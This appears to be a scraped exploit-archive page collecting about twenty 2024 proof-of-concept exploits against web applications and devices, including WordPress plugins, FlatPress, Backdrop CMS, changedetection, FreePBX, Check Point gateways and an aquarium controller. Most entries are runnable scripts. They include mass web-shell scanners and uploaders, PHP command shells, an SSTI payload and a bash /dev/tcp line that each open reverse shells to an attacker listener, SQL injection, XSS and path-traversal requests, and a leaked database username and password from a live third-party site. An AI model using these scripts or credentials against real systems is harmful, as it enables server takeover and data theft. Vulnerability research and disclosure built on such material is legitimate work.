HireHackking

# Exploit Title: Wordpress Plugin Background Image Cropper v1.2 - Remote Code Execution # Date: 2024-04-16 # Author: Milad Karimi (Ex3ptionaL) # Contact: miladgrayhat@gmail.com # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # Vendor Homepage: https://wordpress.org # Software Link: https://wordpress.org/plugins/background-image-cropper/ # Version: 1.2 # Category : webapps # Tested on: windows 10 , firefox import sys , requests, re from multiprocessing.dummy import Pool from colorama import Fore from colorama import init init(autoreset=True) shell = """<?php echo "Ex3ptionaL"; echo "<br>".php_uname()."<br>"; echo "<form method='post' enctype='multipart/form-data'> <input type='file' name='zb'><input type='submit' name='upload' value='upload'></form>"; if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'], $_FILES['zb']['name'])) { echo "eXploiting Done"; } else { echo "Failed to Upload."; } } ?>""" requests.urllib3.disable_warnings() headers = {'Connection': 'keep-alive', 'Cache-Control': 'max-age=0', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8', 'referer': 'www.google.com'} try: target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()] except IndexError: path = str(sys.argv[0]).split('\\') exit('\n [!] Enter <' + path[len(path) - 1] + '> <sites.txt>') def URLdomain(site): if site.startswith("http://") : site = site.replace("http://","") elif site.startswith("https://") : site = site.replace("https://","") else : pass pattern = re.compile('(.*)/') while re.findall(pattern,site): sitez = re.findall(pattern,site) site = sitez[0] return site def FourHundredThree(url): try: url = 'http://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/background-image-cropper/ups.php',headers=headers, allow_redirects=True,timeout=15) if 'enctype="multipart/form-data" name="uploader" id="uploader"><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('Shells.txt', 'a').write(url + '/wp-content/plugins/background-image-cropper/ups.php\n') else: url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/background-image-cropper/ups.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'enctype="multipart/form-data" name="uploader" id="uploader"><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('Shells.txt', 'a').write(url + '/wp-content/plugins/background-image-cropper/ups.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) except : print ' -| ' + url + ' --> {}[Failed]'.format(fr) mp = Pool(150) mp.map(FourHundredThree, target) mp.close() mp.join() print '\n [!] {}Saved in LOL.txt'.format(fc)

# Exploit Title: FlatPress v1.3 - Remote Command Execution # Discovered by: Ahmet Ümit BAYRAM # Discovered Date: 19.04.2024 # Vendor Homepage: https://www.flatpress.org # Software Link: https://github.com/flatpressblog/flatpress/archive/1.3.zip # Tested Version: 1.3 (latest) # Tested on: MacOS import requests import time import random import string def random_string(length=5): """Rastgele bir string oluşturur.""" letters = string.ascii_lowercase return ''.join(random.choice(letters) for i in range(length)) def login_and_upload(base_url, username, password): filename = random_string() + ".php" login_url = f"http://{base_url}/login.php" upload_url = f"http://{base_url}/admin.php?p=uploader&action=default" with requests.Session() as session: # Exploiting print("Exploiting...") time.sleep(1) # Giriş yapma denemesi login_data = { 'user': username, 'pass': password, 'submit': 'Login' } print("Logging in...") response = session.post(login_url, data=login_data) time.sleep(1) if "Logout" in response.text: print("Login Successful!") else: print("Login Failed!") print(response.text) return # Dosya yükleme denemesi print("Shell uploading...") time.sleep(1) # Form verileri ve dosyalar files = { 'upload[]': (filename, '<?=`$_GET[0]`?>', 'text/php'), } form_data = { '_wpnonce': '9e0ed04260', '_wp_http_referer': '/admin.php?p=uploader', 'upload': 'Upload' } response = session.post(upload_url, files=files, data=form_data) if "File(s) uploaded" in response.text or "Upload" in response.text: shell_url = f"http://{base_url}/fp-content/attachs/{filename}" print(f"Your Shell is Ready: {shell_url}") time.sleep(1) print(f"Shell Usage: {shell_url}?0=command") else: print("Exploit Failed!") print(response.status_code, response.text) # Örnek kullanım: python script.py siteadi.com username password if __name__ == "__main__": import sys if len(sys.argv) != 4: print("Usage: script.py <base_url> <username> <password>") else: base_url, username, password = sys.argv[1:] login_and_upload(base_url, username, password)

# Exploit Title: Laravel Framework 11 - Credential Leakage # Google Dork: N/A # Date: [2024-04-19] # Exploit Author: Huseein Amer # Vendor Homepage: [https://laravel.com/] # Software Link: N/A # Version: 8.* - 11.* (REQUIRED) # Tested on: [N/A] # CVE : CVE-2024-29291 Proof of concept: Go to any Laravel-based website and navigate to storage/logs/laravel.log. Open the file and search for "PDO->__construct('mysql:host=". The result: shell Copy code #0 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(70): PDO->__construct('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array) #1 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(46): Illuminate\Database\Connectors\Connector->createPdoConnection('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array) Credentials: Username: u429384055_jscv Password: Jaly$$a0p0p0p0 Host: sql1...

# Exploit Title: SofaWiki 3.9.2 - Remote Command Execution (RCE) (Authenticated) # Discovered by: Ahmet Ümit BAYRAM # Discovered Date: 18.04.2024 # Vendor Homepage: https://www.sofawiki.com # Software Link: https://www.sofawiki.com/site/files/snapshot.zip # Tested Version: v3.9.2 (latest) # Tested on: MacOS import requests import random import sys import time def main(): if len(sys.argv) < 4: print("Usage: python exploit.py <base_url> <username> <password>") sys.exit(1) base_url, username, password = sys.argv[1:4] filename = f"{random.randint(10000, 99999)}.phtml" session = requests.Session() login_url = f"{base_url}/index.php" login_data = { "submitlogin": "Login", "username": username, "pass": password, "name": "SofaWiki", "action": "login" } print("Exploiting...") time.sleep(1) response = session.post(login_url, data=login_data) if "Logout" not in response.text: print("Login failed:", response.text) sys.exit() print("Login Successful") time.sleep(1) php_shell_code = """ <html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> </html> """ print("Shell uploading...") time.sleep(1) upload_url = f"{base_url}/index.php" files = { "uploadedfile": (filename, php_shell_code, "text/php"), "action": (None, "uploadfile"), "MAX_FILE_SIZE": (None, "8000000"), "filename": (None, filename), "content": (None, "content") } response = session.post(upload_url, files=files) if response.status_code == 200: print(f"Your shell is ready: {base_url}/site/files/{filename}") else: print("Upload failed:", response.text) if __name__ == "__main__": main()

# Exploit Title: Flowise 1.6.5 - Authentication Bypass # Date: 17-April-2024 # Exploit Author: Maerifat Majeed # Vendor Homepage: https://flowiseai.com/ # Software Link: https://github.com/FlowiseAI/Flowise/releases # Version: 1.6.5 # Tested on: mac-os # CVE : CVE-2024-31621 The flowise version <= 1.6.5 is vulnerable to authentication bypass vulnerability. The code snippet this.app.use((req, res, next) => { > if (req.url.includes('/api/v1/')) { > whitelistURLs.some((url) => req.url.includes(url)) ? > next() : basicAuthMiddleware(req, res, next) > } else next() > }) puts authentication middleware for all the endpoints with path /api/v1 except a few whitelisted endpoints. But the code does check for the case sensitivity hence only checks for lowercase /api/v1 . Anyone modifying the endpoints to uppercase like /API/V1 can bypass the authentication. *POC:* curl http://localhost:3000/Api/v1/credentials For seamless authentication bypass. Use burpsuite feature Match and replace rules in proxy settings. Add rule Request first line api/v1 ==> API/V1

# Exploit Title: Wordpress Theme XStore 9.3.8 - SQLi # Google Dork: N/A # Date: 2024-05-16 # Exploit Author: [Abdualhadi khalifa (https://twitter.com/absholi_ly) # Version: 5.3.5 # Tested on: Windows10 # CVE: CVE-2024-33559 Poc <https://github.com/absholi7ly/WordPress-XStore-theme-SQL-Injection#poc> POST /?s=%27%3B+SELECT+*+FROM+wp_posts%3B+-- HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: keep-alive Upgrade-Insecure-Requests: 1

# Exploit : Prison Management System Using PHP -SQL Injection Authentication Bypass # Date: 15/03/2024 # Exploit Author: Sanjay Singh # Vendor Homepage: https://www.sourcecodester.com # Software Link:https://www.sourcecodester.com/sql/17287/prison-management-system.html # Tested on: Windows ,XAMPP # CVE : CVE-2024-33288 # Proof of Concept: Step 1-Visit http://localhost/prison/ Step 2 - Click on Admin Dashboard button and redirect on login page. Step 3– Enter username as admin' or '1'='1 and password as 123456 Step 4 – Click sing In and now you will be logged in as admin.

# Title: Rocket LMS 1.9 - Persistent Cross Site Scripting (XSS) # Date: 04/16/2024 # Exploit Author: Sergio Medeiros # Vendor Homepage: https://codecanyon.net/item/rocket-lms-learning-management-academy-script/33120735 # Software Link: https://lms.rocket-soft.org # Version: 1.9 # Tested on Firefox and Chrome Browsers # Patched Version: Patch Pending # Category: Web Application # CVE: CVE-2024-34241 # Exploit link: https://grumpz.net/cve-2024-34241-a-step-by-step-discovery-guide # PoC: In order to exploit this systemic stored XSS vulnerability, identify theareas in the web application which has a WYSIWIG editor used, for example, the create/edit course description section. Input random text in the description section, and create the course while intercepting the request with BurpSuite or your preferred proxy of choice. In the *description* parameter or the associated parameter that is handling the user input related to the WYSIWIG editor, input the following payload and then issue the request: <details/open/ontoggle=prompt(origin)>

# Exploit Title: Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE) # Date: 04/27/2024 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://backdropcms.org/ # Software Link: https://github.com/backdrop/backdrop/releases/download/1.27.1/backdrop.zip # Version: latest # Tested on: MacOS import os import time import zipfile def create_files(): info_content = """ type = module name = Block description = Controls the visual building blocks a page is constructed with. Blocks are boxes of content rendered into an area, or region, of a web page. package = Layouts tags[] = Blocks tags[] = Site Architecture version = BACKDROP_VERSION backdrop = 1.x configure = admin/structure/block ; Added by Backdrop CMS packaging script on 2024-03-07 project = backdrop version = 1.27.1 timestamp = 1709862662 """ shell_info_path = "shell/shell.info" os.makedirs(os.path.dirname(shell_info_path), exist_ok=True) # Klasörüoluşturur with open(shell_info_path, "w") as file: file.write(info_content) shell_content = """ <html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> </html> """ shell_php_path = "shell/shell.php" with open(shell_php_path, "w") as file: file.write(shell_content) return shell_info_path, shell_php_path def create_zip(info_path, php_path): zip_filename = "shell.zip" with zipfile.ZipFile(zip_filename, 'w') as zipf: zipf.write(info_path, arcname='shell/shell.info') zipf.write(php_path, arcname='shell/shell.php') return zip_filename def main(url): print("Backdrop CMS 1.27.1 - Remote Command Execution Exploit") time.sleep(3) print("Evil module generating...") time.sleep(2) info_path, php_path = create_files() zip_filename = create_zip(info_path, php_path) print("Evil module generated!", zip_filename) time.sleep(2) print("Go to " + url + "/admin/modules/install and upload the " + zip_filename + " for Manual Installation.") time.sleep(2) print("Your shell address:", url + "/modules/shell/shell.php") if __name__ == "__main__": import sys if len(sys.argv) < 2: print("Usage: python script.py [url]") else: main(sys.argv[1])

# Exploit Title: Apache OFBiz 18.12.12 - Directory Traversal # Google Dork: N/A # Date: 2024-05-16 # Exploit Author: [Abdualhadi khalifa (https://twitter.com/absholi_ly) # Vendor Homepage: https://ofbiz.apache.org/ ## Software Link: https://ofbiz.apache.org/download.html # Version: below <=18.12.12 # Tested on: Windows10 Poc. 1- POST /webtools/control/xmlrpc HTTP/1.1 Host: vulnerable-host.com Content-Type: text/xml <?xml version="1.0"?> <methodCall> <methodName>example.createBlogPost</methodName> <params> <param> <value><string>../../../../../../etc/passwd</string></value> </param> </params> </methodCall> OR 2- POST /webtools/control/xmlrpc HTTP/1.1 Host: vulnerable-host.com Content-Type: text/xml <?xml version="1.0"?> <methodCall> <methodName>performCommand</methodName> <params> <param> <value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value> </param> </params> </methodCall>

# Exploit Title: PopojiCMS 2.0.1 - Remote Command Execution # Date: 14/04/2024 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://www.popojicms.org/ # Software Link: https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip # Version: Version : 2.0.1 # Tested on: https://www.softaculous.com/apps/cms/PopojiCMS import requests import time import sys def exploit(url, username, password): login_url = f"{url}/po-admin/route.php?mod=login&act=proclogin" login_data = {"username": username, "password": password} headers = {"Content-Type": "application/x-www-form-urlencoded", "Referer": f "{url}/po-admin/index.php"} session = requests.Session() login_response = session.post(login_url, data=login_data, headers=headers) if "Administrator PopojiCMS" in login_response.text: print("Login Successful!") time.sleep(1) # 1 saniye bekle else: print("Login Failed!") return edit_url = f"{url}/po-admin/route.php?mod=setting&act=metasocial" edit_data = {"meta_content": """<html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> </html>"""} edit_response = session.post(edit_url, data=edit_data, headers=headers) if "cmd" in edit_response.text: print("Your shell is ready:", url) time.sleep(1) else: print("Exploit Failed!") return if __name__ == "__main__": if len(sys.argv) != 4: print("Kullanım: python exploit.py sitename username password") sys.exit(1) url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] print("Exploiting...") time.sleep(1) print("Logging in...") time.sleep(1) exploit(url, username, password)

# Exploit Title: iMLog < 1.307 - Persistent Cross Site Scripting (XSS) # Date: 22/5/2024 # Exploit Author: Gabriel Felipe # Vendor Homepage: https://itssglobal.com # Software Link: https://itssglobal.com/index.php/imlog/ # Version: 1.307 # Tested on: Firefox and Chrome Browsers # Patched Version: 1.308 # Category: Web Application # PoC: iMLog < 1.307 is vulnerable to persistent cross-site scripting (XSS) via the "User Management" feature. An attacker could inject malicious javascript code on a controlled user so when an admin goes to the "User Maintenance" malicious code is executed and could lead to new admin user creations resulting in privilege escalation. 1. Login to user account 2. Go to Setup > "User Maintenance" 3. Click on "Search" and then select your UserID. 4. Change the "Last Name" input to `<img/src/onerror=prompt('XSS')>` 5. Click on "Save" 6. Refresh the page, XSS will be triggered.

Exploit Title: BWL Advanced FAQ Manager 2.0.3 - Authenticated SQL Injection Date: 14 Apr 2024 Exploit Author: Ivan Spiridonov (xbz0n) Software Link: https://codecanyon.net/item/bwl-advanced-faq-manager/5007135 Version: 2.0.3 Tested on: Ubuntu 20.04 CVE: CVE-2024-32136 SQL Injection SQL injection is a type of security vulnerability that allows an attacker to interfere with an application's database queries. It usually involves the insertion or "injection" of an SQL query via the input data from the client into the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system. Affected Components Plugin: BWL Advanced FAQ Manager Version: 2.0.3 Affected Parameter: 'date_range' Affected Page: /wp-admin/edit.php Description The vulnerability exists within the 'date_range' parameter used in the 'bwl-advanced-faq-analytics' page of the BWL Advanced FAQ Manager plugin. Authenticated attackers can execute arbitrary SQL commands within the database by manipulating the input to this parameter. Proof of Concept Manual Exploitation The following GET request demonstrates the vulnerability: GET /wp-admin/edit.php?page=bwl-advanced-faq-analytics&post_type=bwl_advanced_faq&filter_type=views&date_range=(select*from(select(sleep(20)))a)&faq_id=all HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://localhost/wp-admin/edit.php?post_type=bwl_advanced_faq&page=bwl-advanced-faq-analytics Connection: close Cookie: [Relevant Cookies] Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 If the server response is delayed by approximately 20 seconds, it indicates a successful exploitation of the time-based SQL Injection, confirming the vulnerability. Recommendations BWL Advanced FAQ Manager v2.0.3 users are advised to update the plugin to the fixed version v2.0.4.

# Exploit Title : ElkArte Forum 1.1.9 - Remote Code Execution (RCE) (Authenticated) # Date: 2024-5-24 # Exploit Author: tmrswrr # Category: Webapps # Vendor Homepage: https://www.elkarte.net/ # Software Link : https://github.com/elkarte/Elkarte/releases/download/v1.1.9/ElkArte_v1-1-9_install.zip # Version : 1.1.9 1) After login go to Manage and Install theme > https://127.0.0.1/ElkArte/index.php?action=admin;area=theme;sa=admin;c2e3e39a0d=276c2e3e39a0d65W2qg1voAFfX1yNc5m 2) Upload test.zip file and click install > test.zip > test.php > <?php echo system('id'); ?> 3) Go to Theme Setting > Theme Directory > https://127.0.0.1/ElkArte/themes/test/test.php Result : uid=1000(ElkArte) gid=1000(ElkArte) groups=1000(ElkArte) uid=1000(ElkArte) gid=1000(ElkArte) groups=1000(ElkArte)

# Exploit Title: htmlLawed 1.2.5 - Remote Code Execution (RCE) # Date: 2024-04-24 # Exploit Author: Miguel Redondo (aka d4t4s3c) # Vendor Homepage: https://www.bioinformatics.org/phplabware/internal_utilities/htmLawed # Software Link: https://github.com/kesar/HTMLawed # Version: <= 1.2.5 # Tested on: Linux # CVE: CVE-2022-35914 banner(){ echo " ______ _______ ____ ___ ____ ____ _________ ___ _ _ _" echo " / ___\ \ / / ____| |___ \ / _ \___ \|___ \ |___ / ___|/ _ \/ | || |" echo "| | \ \ / /| _| _____ __) | | | |__) | __) |____ |_ \___ \ (_) | | || |_" echo "| |___ \ V / | |__|_____/ __/| |_| / __/ / __/_____|__) |__) \__, | |__ _|" echo " \____| \_/ |_____| |_____|\___/_____|_____| |____/____/ /_/|_| |_|" } while getopts ":u:c:" arg; do case $arg in u) URL=$OPTARG; let parameter_counter+=1 ;; c) CMD=$OPTARG; let parameter_counter+=1 ;; esac done if [ -z "$URL" ] || [ -z "$CMD" ]; then banner echo -e "\n[i] Usage: ${0} -u <URL> -c <CMD>\n" exit else banner echo -e "\n[+] Command output:" fi curl -s -d "sid=foo&hhook=exec&text=${CMD}" -b "sid=foo" ${URL} | egrep '\&nbsp; \[[0-9]+\] =\>'| sed -E 's/\&nbsp; \[[0-9]+\] =\> (.*)<br \/>/\1/'

# Exploit Title: changedetection <= 0.45.20 Remote Code Execution (RCE) # Date: 5-26-2024 # Exploit Author: Zach Crosman (zcrosman) # Vendor Homepage: changedetection.io # Software Link: https://github.com/dgtlmoon/changedetection.io # Version: <= 0.45.20 # Tested on: Linux # CVE : CVE-2024-32651 from pwn import * import requests from bs4 import BeautifulSoup import argparse def start_listener(port): listener = listen(port) print(f"Listening on port {port}...") conn = listener.wait_for_connection() print("Connection received!") context.newline = b'\r\n' # Switch to interactive mode conn.interactive() def add_detection(url, listen_ip, listen_port, notification_url=''): session = requests.Session() # First request to get CSRF token request1_headers = { "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } response = session.get(url, headers=request1_headers) soup = BeautifulSoup(response.text, 'html.parser') csrf_token = soup.find('input', {'name': 'csrf_token'})['value'] print(f'Obtained CSRF token: {csrf_token}') # Second request to submit the form and get the redirect URL add_url = f"{url}/form/add/quickwatch" add_url_headers = { # Define add_url_headers here "Origin": url, "Content-Type": "application/x-www-form-urlencoded" } add_url_data = { "csrf_token": csrf_token, "url": "https://reddit.com/r/baseball", "tags": '', "edit_and_watch_submit_button": "Edit > Watch", "processor": "text_json_diff" } post_response = session.post(add_url, headers=add_url_headers, data=add_url_data, allow_redirects=False) # Extract the URL from the Location header if 'Location' in post_response.headers: redirect_url = post_response.headers['Location'] print(f'Redirect URL: {redirect_url}') else: print('No redirect URL found') return # Third request to add the changedetection url with ssti in notification config save_detection_url = f"{url}{redirect_url}" save_detection_headers = { # Define save_detection_headers here "Referer": redirect_url, "Cookie": f"session={session.cookies.get('session')}" } save_detection_data = { "csrf_token": csrf_token, "url": "https://reddit.com/r/all", "title": '', "tags": '', "time_between_check-weeks": '', "time_between_check-days": '', "time_between_check-hours": '', "time_between_check-minutes": '', "time_between_check-seconds": '30', "filter_failure_notification_send": 'y', "fetch_backend": 'system', "webdriver_delay": '', "webdriver_js_execute_code": '', "method": 'GET', "headers": '', "body": '', "notification_urls": notification_url, "notification_title": '', "notification_body": f""" {{% for x in ().__class__.__base__.__subclasses__() %}} {{% if "warning" in x.__name__ %}} {{{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\\"{listen_ip}\\",{listen_port}));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\\"/bin/bash\\")'").read()}}}} {{% endif %}} {{% endfor %}} """, "notification_format": 'System default', "include_filters": '', "subtractive_selectors": '', "filter_text_added": 'y', "filter_text_replaced": 'y', "filter_text_removed": 'y', "trigger_text": '', "ignore_text": '', "text_should_not_be_present": '', "extract_text": '', "save_button": 'Save' } final_response = session.post(save_detection_url, headers=save_detection_headers, data=save_detection_data) print('Final request made.') if __name__ == "__main__": parser = argparse.ArgumentParser(description='Add detection and start listener') parser.add_argument('--url', type=str, required=True, help='Base URL of the target site') parser.add_argument('--port', type=int, help='Port for the listener', default=4444) parser.add_argument('--ip', type=str, required=True, help='IP address for the listener') parser.add_argument('--notification', type=str, help='Notification url if you don\'t want to use the system default') args = parser.parse_args() add_detection(args.url, args.ip, args.port, args.notification) start_listener(args.port)

# Exploit Title: Check Point Security Gateway - Information Disclosure (Unauthenticated) # Exploit Author: Yesith Alvarez # Vendor Homepage: https://support.checkpoint.com/results/sk/sk182336 # Version: R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, R81.20 # CVE : CVE-2024-24919 from requests import Request, Session import sys import json def title(): print(''' _______ ________ ___ ___ ___ _ _ ___ _ _ ___ __ ___ / ____\ \ / / ____| |__ \ / _ \__ \| || | |__ \| || | / _ \/_ |/ _ \ | | \ \ / /| |__ ______ ) | | | | ) | || |_ ______ ) | || || (_) || | (_) | | | \ \/ / | __|______/ /| | | |/ /|__ _|______/ /|__ _\__, || |\__, | | |____ \ / | |____ / /_| |_| / /_ | | / /_ | | / / | | / / \_____| \/ |______| |____|\___/____| |_| |____| |_| /_/ |_| /_/ Author: Yesith Alvarez Github: https://github.com/yealvarez Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/ ''') def exploit(url, path): url = url + '/clients/MyCRL' data = "aCSHELL/../../../../../../../../../../.."+ path headers = { 'Connection': 'keep-alive', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0' } s = Session() req = Request('POST', url, data=data, headers=headers) prepped = req.prepare() #del prepped.headers['Content-Type'] resp = s.send(prepped, verify=False, timeout=15 ) print(prepped.headers) print(url) print(resp.headers) print(resp.status_code) if __name__ == '__main__': title() if(len(sys.argv) < 3): print('[+] USAGE: python3 %s https://<target_url> path\n'%(sys.argv[0])) print('[+] EXAMPLE: python3 %s https://192.168.0.10 "/etc/passwd"\n'%(sys.argv[0])) exit(0) else: exploit(sys.argv[1],sys.argv[2])

# Exploit Title: FreePBX 16 - Remote Code Execution (RCE) (Authenticated) # Exploit Author: Cold z3ro # Date: 6/1/2024 # Tested on: 14,15,16 # Vendor: https://www.freepbx.org/ <?php /// /// FREEPBX [14,15,16] API Module Authenticated RCE /// Orginal Difcon || https://www.youtube.com/watch?v=rqFJ0BxwlLI /// Cod[3]d by Cold z3ro /// $url = "10.10.10.186"; // remote host $backconnectip = "192.168.0.2"; $port = "4444"; $PHPSESSID = "any valid session even extension"; echo "checking $url\n"; $url = trim($url); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, 'http://'.$url.'/admin/ajax.php?module=api&command=generatedocs'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'POST'); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 2); curl_setopt($ch, CURLOPT_TIMEOUT, 2); curl_setopt($ch, CURLOPT_HTTPHEADER, [ 'Referer: http://'.$url.'/admin/config.php?display=api', 'Content-Type: application/x-www-form-urlencoded', ]); curl_setopt($ch, CURLOPT_COOKIE, 'PHPSESSID='.$PHPSESSID); curl_setopt($ch, CURLOPT_POSTFIELDS, 'scopes=rest&host=http://'.$backconnectip.'/$(bash -1 >%26 /dev/tcp/'.$backconnectip.'/4444 0>%261)'); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); echo $response = curl_exec($ch)."\n"; curl_close($ch); ?>

# Exploit Title: Akaunting 3.1.8 - Server-Side Template Injection (SSTI) # Exploit Author: tmrswrr # Date: 30/05/2024 # Vendor: https://akaunting.com/forum # Software Link: https://akaunting.com/apps/crm # Vulnerable Version(s): 3.1.8 # Tested : https://www.softaculous.com/apps/erp/Akaunting 1 ) Login with admin cred and go to : Items > New Item https://127.0.0.1/Akaunting/1/common/items 2 ) Write SSTI payload : {{7*7}} Name field , write Sale and Purchase Price random numbers 3 ) Save it 4 ) You will be see result : 49 ==================================================================================== 1 ) Login with admin cred and go to :Settings > Taxes > New Tax https://127.0.0.1/Akaunting/1/settings/taxes/1/edit 2 ) Write SSTI payload : {{7*7}} Name field , write Sale and Purchase Price random numbers 3 ) Save it 4 ) You will be see result : 49 > {{'a'.toUpperCase()}} > A > {{'a'.concat('b')}} > ab ==================================================================================== 1 ) Login with admin cred and go to : Banking > Transactions > New Income https://127.0.0.1/Akaunting/1/banking/transactions/create?type=income 2 ) Write SSTI payload : {{7*7}} Description field 3 ) Save it 4 ) You will be see result : 49 > {{'a'.toUpperCase()}} > A > {{'a'.concat('b')}} > ab ======================================================================================= 1 ) Login with admin cred https://127.0.0.1/Akaunting/1/purchases/vendors/1/edit 2 ) Write SSTI payload : {{7*7}} Name field 3 ) Save it 4 ) You will be see result : 49 > {{'a'.toUpperCase()}} > A > {{'a'.concat('b')}} > ab

#!/usr/bin/env python # -*- coding: utf-8 -*- # # # Aquatronica Control System 5.1.6 Passwords Leak Vulnerability # # # Vendor: Aquatronica s.r.l. # Product web page: https://www.aquatronica.com # Affected version: Firmware: 5.1.6 # Web: 2.0 # # Summary: Aquatronica's electronic AQUARIUM CONTROLLER is easy # to use, allowing you to control all the electrical devices in # an aquarium and to monitor all their parameters; it can be used # for soft water aquariums, salt water aquariums or both simultaneously. # # Desc: The tcp.php endpoint on the Aquatronica controller is exposed # to unauthenticated attackers over the network. This vulnerability # allows remote attackers to send a POST request which can reveal # sensitive configuration information, including plaintext passwords. # This can lead to unauthorized access and control over the aquarium # controller, compromising its security and potentially allowing attackers # to manipulate its settings. # # Tested on: Apache/2.0.54 (Unix) # PHP/5.4.17 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2024-5824 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5824.php # # # 04.05.2024 # import requests, html, re, sys, time from urllib.parse import unquote program = "TCP" command = "ws_get_network_cfg" function_id = "TCP_XML_REQUEST" print(""" _________ . . (.. \_ , |\ /| \ O \ /| \ \/ / \______ \/ | \ / vvvv\ \ | / | \^^^^ == \_/ | `\_ === \. | / /\_ \ / | |/ \_ \| / ___ ______________\________/________aquatronica_0day___ | | | | | | """) if len(sys.argv) != 2: print("Usage: python aqua.py <ip:port>") sys.exit(1) ip = sys.argv[1] url = f"http://{ip}/{program.lower()}.php" post_data = {'function_id' : function_id.lower(), 'command' : command.upper()} r = requests.post(url, data=post_data) if r.status_code == 200: r_d = unquote(r.text) f_d_r = html.unescape(r_d) regex = r'pwd="([^"]+)"' rain = re.findall(regex, f_d_r) for drops in rain: print(' ',drops) time.sleep(0.5) else: print(f"Dry season! {r.status_code}")

